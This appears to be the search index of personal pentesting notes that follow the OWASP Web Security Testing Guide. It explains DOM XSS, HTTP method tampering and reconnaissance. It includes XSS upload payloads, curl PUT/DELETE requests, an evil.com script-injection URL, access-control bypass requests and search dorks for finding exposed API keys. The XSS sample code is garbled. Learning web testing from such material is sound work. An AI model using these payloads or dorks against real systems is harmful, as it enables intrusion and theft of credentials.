        ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

        The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#causes","title":"Causes","text":"

        This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

        <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome\";\n    var name = document.location.hash.search(/#W!1)+3,\n                document.location.hash.length\n                );\n    document.getElementById('Welcome').innerHTML = w + name;\n</script>\n

        location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

        To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

        What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

        Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

        Which sinks can lead to DOM-XSS vulnerabilities:

        • document.write()
        • document.writeln()
        • document.replace()
        • document.domain
        • element.innerHTML
        • element.outerHTML
        • element.insertAdjacentHTML
        • element.onevent

        This project, DOMXSS wiki aims to identify sources and sinks methods exposed by public, widely used javascript frameworks.

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#attack-techniques","title":"Attack techniques","text":"

        Go to my XSS cheat sheet

        ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-02/","title":"Testing for JavaScript Execution","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.2. Testing for JavaScript Execution

        ID Link to Hackinglife Link to OWASP Description 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points.","tags":["web pentesting","WSTG-CLNT-02"]},{"location":"OWASP/WSTG-CLNT-03/","title":"Testing for HTML Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.3. Testing for HTML Injection

        ID Link to Hackinglife Link to OWASP Description 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user=","tags":["web pentesting","WSTG-CLNT-03"]},{"location":"OWASP/WSTG-CLNT-04/","title":"Testing for Client-side URL Redirect","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.4. Testing for Client-side URL Redirect

        ID Link to Hackinglife Link to OWASP Description 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site","tags":["web pentesting","WSTG-CLNT-04"]},{"location":"OWASP/WSTG-CLNT-05/","title":"Testing for CSS Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.5. Testing for CSS Injection

        ID Link to Hackinglife Link to OWASP Description 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection.","tags":["web pentesting","WSTG-CLNT-05"]},{"location":"OWASP/WSTG-CLNT-06/","title":"Testing for Client-side Resource Manipulation","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.6. Testing for Client-side Resource Manipulation

        ID Link to Hackinglife Link to OWASP Description 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js","tags":["web pentesting","WSTG-CLNT-06"]},{"location":"OWASP/WSTG-CLNT-07/","title":"Testing Cross Origin Resource Sharing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.7. Testing Cross Origin Resource Sharing

        ID Link to Hackinglife Link to OWASP Description 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless.","tags":["web pentesting","WSTG-CLNT-07"]},{"location":"OWASP/WSTG-CLNT-08/","title":"Testing for Cross Site Flashing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.8. Testing for Cross Site Flashing

        ID Link to Hackinglife Link to OWASP Description 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil","tags":["web pentesting","WSTG-CLNT-08"]},{"location":"OWASP/WSTG-CLNT-09/","title":"Testing for Clickjacking","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.9. Testing for Clickjacking

        ID Link to Hackinglife Link to OWASP Description 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable.","tags":["web pentesting","WSTG-CLNT-09"]},{"location":"OWASP/WSTG-CLNT-10/","title":"Testing WebSockets","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.10. Testing WebSockets

        ID Link to Hackinglife Link to OWASP Description 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels.","tags":["web pentesting","WSTG-CLNT-10"]},{"location":"OWASP/WSTG-CLNT-11/","title":"Testing Web Messaging","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.11. Testing Web Messaging

        ID Link to Hackinglife Link to OWASP Description 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input.","tags":["web pentesting","WSTG-CLNT-11"]},{"location":"OWASP/WSTG-CLNT-12/","title":"Testing Browser Storage","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.12. Testing Browser Storage

        ID Link to Hackinglife Link to OWASP Description 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries.","tags":["web pentesting","WSTG-CLNT-12"]},{"location":"OWASP/WSTG-CLNT-13/","title":"Testing for Cross Site Script Inclusion","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.13. Testing for Cross Site Script Inclusion

        ID Link to Hackinglife Link to OWASP Description 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques.","tags":["web pentesting","WSTG-CLNT-13"]},{"location":"OWASP/WSTG-CLNT-14/","title":"Testing for Reverse Tabnabbing","text":"

        OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.14. Testing for Reverse Tabnabbing

        ID Link to Hackinglife Link to OWASP Description 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["web pentesting","WSTG-CLNT-14"]},{"location":"OWASP/WSTG-CONF-01/","title":"Test Network Infrastructure Configuration","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.1. Test Network Infrastructure Configuration

        ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.","tags":["web pentesting","reconnaissance","WSTG-CONF-01","dorkings"]},{"location":"OWASP/WSTG-CONF-02/","title":"Test Application Platform Configuration","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.2. Test Application Platform Configuration

        ID Link to Hackinglife Link to OWASP Description 2.2 WSTG-CONF-02 Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40, 50) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review","tags":["web pentesting","reconnaissance","WSTG-CONF-02"]},{"location":"OWASP/WSTG-CONF-03/","title":"Test File Extensions Handling for Sensitive Information","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.3. Test File Extensions Handling for Sensitive Information

        ID Link to Hackinglife Link to OWASP Description 2.3 WSTG-CONF-03 Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set.","tags":["web pentesting","reconnaissance","WSTG-CONF-03"]},{"location":"OWASP/WSTG-CONF-04/","title":"Review Old Backup and Unreferenced Files for Sensitive Information","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.4. Review Old Backup and Unreferenced Files for Sensitive Information

        ID Link to Hackinglife Link to OWASP Description 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename","tags":["web pentesting","reconnaissance","WSTG-CONF-04"]},{"location":"OWASP/WSTG-CONF-05/","title":"Enumerate Infrastructure and Application Admin Interfaces","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.5. Enumerate Infrastructure and Application Admin Interfaces

        ID Link to Hackinglife Link to OWASP Description 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)","tags":["web pentesting","reconnaissance","WSTG-CONF-05"]},{"location":"OWASP/WSTG-CONF-06/","title":"Test HTTP Methods","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.6. Test HTTP Methods

        ID Link to Hackinglife Link to OWASP Description 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques.

        HTTP method tampering, also known as HTTP verb tampering, is a type of security vulnerability that can be exploited in web applications. HTTP method tampering occurs when an attacker modifies the HTTP method being used in a request to trick the web application into performing unintended actions.

        More about HTTP methods.

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#test-objectives","title":"Test Objectives","text":"
        • Enumerate supported HTTP methods.
        • Test for access control bypass.
        • Test HTTP method overriding techniques.

        Enumerate with OPTIONS:

        curl -v -X OPTIONS <target>\n

        Test access control bypass with a made-up method:

        curl -v -X FAKEMETHOD <target>\n

        Or test access control bypass with other methods.

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#put","title":"PUT","text":"

        After enumerating methods with Burpsuite:

        OPTIONS /uploads HTTP/1.1\nHost: example.org\n

        We obtained as response:

        HTTP/1.1 200 OK\nDate: ....\n....\nAllow: OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE,PROPPATCH,COPY,MOVE,LOCK\n

        Then, we can try to upload a file by using Burpsuite. Typical payload:

        PUT /test.html HTTP/1.1\nHost: example.org\nContent-Length: 25\n\n<script>alert(1)</script>\n

        Try to upload a file by using curl. Typical payload:

        curl https://example.org --upload-file test.html\ncurl -X PUT https://example.org/test.html -d \"<script>alert(1)</script>\"\n
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#delete","title":"DELETE","text":"

        Try to delete a file by using Burpsuite. Typical payload:

        DELETE /uploads/file1.pdf HTTP/1.1\nHost: example.org\n

        Try to delete a file by using curl. Typical payload:

        curl -X DELETE https://example.org/uploads/file1.pdf\n
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#trace","title":"TRACE","text":"

        The\u00a0TRACE\u00a0method (or Microsoft\u2019s equivalent\u00a0TRACK\u00a0method) causes the server to echo back the contents of the request. This led to a vulnerability called Cross-Site Tracing (XST), which could be used to access cookies that had the\u00a0HttpOnly\u00a0flag set. The\u00a0TRACE\u00a0method has been blocked in all browsers and plugins for many years; as such, this issue is no longer exploitable. However, it may still be flagged by automated scanning tools, and the\u00a0TRACE\u00a0method being enabled on a web server suggests that is has not been properly hardened.

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#connect","title":"CONNECT","text":"

        The\u00a0CONNECT\u00a0method causes the web server to open a TCP connection to another system, and then pass traffic from the client to that system. This could allow an attacker to proxy traffic through the server, in order to hide their source address, access internal systems or access services that are bound to localhost. An example of a\u00a0CONNECT\u00a0request is shown below:

        CONNECT 192.168.0.1:443 HTTP/1.1\nHost: example.org\n
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-access-control-bypass","title":"Testing for Access Control Bypass","text":"

        If a page on the application redirects users to a login page with a 302 code when they attempt to access it directly, it may be possible to bypass this by making a request with a different HTTP method, such as\u00a0HEAD,\u00a0POST\u00a0or even a made up method such as\u00a0FOO. If the web application responds with a\u00a0HTTP/1.1 200 OK\u00a0rather than the expected\u00a0HTTP/1.1 302 Found, it may then be possible to bypass the authentication or authorization.

        HEAD /admin/ HTTP/1.1\nHost: example.org\n
        HTTP/1.1 200 OK\n[...]\nSet-Cookie: adminSessionCookie=[...];\n
        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-http-method-overriding","title":"Testing for HTTP Method Overriding","text":"

        Some web frameworks provide a way to override the actual HTTP method in the request. They achieve this by emulating the missing HTTP verbs and passing some custom headers in the requests. For example:

        • X-HTTP-Method
        • X-HTTP-Method-Override
        • X-Method-Override

        To test this, consider scenarios where restricted verbs like\u00a0PUT\u00a0or\u00a0DELETE\u00a0return a\u00a0405 Method not allowed. In such cases, replay the same request, but add the alternative headers for HTTP method overriding.

        ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-07/","title":"Test HTTP Strict Transport Security","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.7. Test HTTP Strict Transport Security

        ID Link to Hackinglife Link to OWASP Description 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ |","tags":["web pentesting","reconnaissance","WSTG-CONF-07"]},{"location":"OWASP/WSTG-CONF-08/","title":"Test RIA Cross Domain Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.8. Test RIA Cross Domain Policy

        ID Link to Hackinglife Link to OWASP Description 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.","tags":["web pentesting","reconnaissance","WSTG-CONF-08"]},{"location":"OWASP/WSTG-CONF-09/","title":"Test File Permission","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.9. Test File Permission

        ID Link to Hackinglife Link to OWASP Description 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default.","tags":["web pentesting","reconnaissance","WSTG-CONF-09"]},{"location":"OWASP/WSTG-CONF-10/","title":"Test for Subdomain Takeover","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.10. Test for Subdomain Takeover

        ID Link to Hackinglife Link to OWASP Description 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains.","tags":["web pentesting","reconnaissance","WSTG-CONF-10"]},{"location":"OWASP/WSTG-CONF-11/","title":"Test Cloud Storage","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.11. Test Cloud Storage

        ID Link to Hackinglife Link to OWASP Description 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place.","tags":["web pentesting","reconnaissance","WSTG-CONF-11"]},{"location":"OWASP/WSTG-CONF-12/","title":"Testing for Content Security Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.12. Testing for Content Security Policy

        ID Link to Hackinglife Link to OWASP Description 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations.","tags":["web pentesting","reconnaissance","WSTG-CONF-12"]},{"location":"OWASP/WSTG-CONF-13/","title":"Test Path Confusion","text":"

        OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.13. Test Path Confusion

        ID Link to Hackinglife Link to OWASP Description 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["web pentesting","reconnaissance","WSTG-CONF-13"]},{"location":"OWASP/WSTG-CRYP-01/","title":"Testing for Weak Transport Layer Security","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.1. Testing for Weak Transport Layer Security

        ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application.","tags":["web pentesting","WSTG-CRYP-01"]},{"location":"OWASP/WSTG-CRYP-02/","title":"Testing for Padding Oracle","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.2. Testing for Padding Oracle

        ID Link to Hackinglife Link to OWASP Description 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.","tags":["web pentesting","WSTG-CRYP-02"]},{"location":"OWASP/WSTG-CRYP-03/","title":"Testing for Sensitive Information Sent via Unencrypted Channels","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.3. Testing for Sensitive Information Sent via Unencrypted Channels

        ID Link to Hackinglife Link to OWASP Description 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data)","tags":["web pentesting","WSTG-CRYP-03"]},{"location":"OWASP/WSTG-CRYP-04/","title":"Testing for Weak Encryption","text":"

        OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.4. Testing for Weak Encryption

        ID Link to Hackinglife Link to OWASP Description 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["web pentesting","WSTG-CRYP-04"]},{"location":"OWASP/WSTG-ERRH-01/","title":"Testing for Improper Error Handling","text":"

        OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Improper Error Handling

        ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: Random files/folders (40x) - Analyze the different output returned.","tags":["web pentesting","WSTG-ERRH-01"]},{"location":"OWASP/WSTG-ERRH-02/","title":"Testing for Stack Traces","text":"

        OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Stack Traces

        ID Link to Hackinglife Link to OWASP Description 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["web pentesting","WSTG-ERRH-02"]},{"location":"OWASP/WSTG-IDNT-01/","title":"Test Role Definitions","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.1. Test Role Definitions

        ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given.

        OWASP/WSTG-IDNT-01.md

        ","tags":["web pentesting","WSTG-IDNT-01"]},{"location":"OWASP/WSTG-IDNT-02/","title":"Test User Registration Process","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.2. Test User Registration Process

        ID Link to Hackinglife Link to OWASP Description 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process.","tags":["web pentesting","WSTG-IDNT-02"]},{"location":"OWASP/WSTG-IDNT-03/","title":"Test Account Provisioning Process","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.3. Test Account Provisioning Process

        ID Link to Hackinglife Link to OWASP Description 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type.","tags":["web pentesting","WSTG-IDNT-03"]},{"location":"OWASP/WSTG-IDNT-04/","title":"Testing for Account Enumeration and Guessable User Account","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.4. Testing for Account Enumeration and Guessable User Account

        ID Link to Hackinglife Link to OWASP Description 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis.","tags":["web pentesting","WSTG-IDNT-04"]},{"location":"OWASP/WSTG-IDNT-05/","title":"Testing for Weak or Unenforced Username Policy","text":"

        OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.5 Testing for Weak or Unenforced Username Policy

        ID Link to Hackinglife Link to OWASP Description 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["web pentesting","WSTG-IDNT-05"]},{"location":"OWASP/WSTG-INFO-01/","title":"Conduct search engine discovery reconnaissance for information leakage","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).

        This is merely passive reconnaissance.

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-multiple-search-engines","title":"Use multiple search engines","text":"
        • Baidu
        • Bing
        • binsearch.info
        • Common crawl
        • Duckduckgo
        • Wayback machine
        • Startpage (based on google but trackers and logs)
        • Shodan.
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-operators","title":"Use operators","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#google-dorks","title":"Google Dorks","text":"

        More about google dorks.

        Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-son/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.

        Use cache operator

        cache:target.com\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#github","title":"Github","text":"

        More Githun Dorking.

        Github Dowking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveal some authorization token. filename: swagger.json Go to Code tab and you will have the swagger file.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#shodan","title":"Shodan","text":"

        Go to shodan.

        Shodan Dowking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If you are using wordpress","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#waybackmachine-with-waybackurls","title":"WaybackMachine with WayBackUrls","text":"

        waybackurls inspects back URLs saved by Wayback Machine and look for specific keywords. Installation:

        go install github.com/tomnomnom/waybackurls@latest\n

        Basic usage:

        waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n

        Dork for API endpoints discovery:

        Waybackmachine Dowking Query Expected results Path to a API We are trying to see is there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly not anymore.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-02/","title":"Fingerprint Web Server","text":"

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

        ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#passive-fingerprinting","title":"Passive fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#whois","title":"Whois","text":"
         whois $TARGET\n
        whois.exe <TARGET>\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#banner-grabbing","title":"Banner grabbing","text":"
        • nmap.
          # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
        • telnet
        • openssl
          openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
          • sending malformed request (with SANTACLAUS method for instance):
            GET / SANTACLAUS/1.1\n
        • Some targets obfuscate their servers by modifying headers, but, there is a default ordering in the headers response, so you can do some guessing from ordering too.

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#automatic-scanning-tools","title":"Automatic scanning tools","text":"

        netcraft, nikto.

        Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#active-fingerprinting","title":"Active fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#http-headers-and-html-source-code","title":"HTTP headers and HTML Source code","text":"
        • Note the response header Server, X-Powered-By, or X-Generator as well.
        • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
        • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
        nmap -sV -F target\n
        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-03/","title":"Review Webserver Metafiles for Information Leakage","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.3. Review Webserver Metafiles for Information Leakage

        ID Link to Hackinglife Link to OWASP Objectives 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, <META> tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand.","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#searching-for-well-known-files","title":"Searching for well-known files","text":"
        • robots.txt
        • sitemap.xml
        • security.txt (proposed standard which allows websites to define security policies and contact details.)
        • human.txt (initiative for knowing the people behind a website.)
        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#examining-meta-tags","title":"Examining META tags","text":"

        <META> tags are located within the HEADsection of each HTML document.

        Robots directive can also be specified through the use of a specific METAtag.

        <META NAME=\"ROBOTS\" ...>\n

        If no META tag is present, then the default is INDEX, FOLLOW.

        Other revealing META tags.

        ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#the-well-known-directory","title":"The .well-known/ directory","text":"

        Some of the files are these: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml.

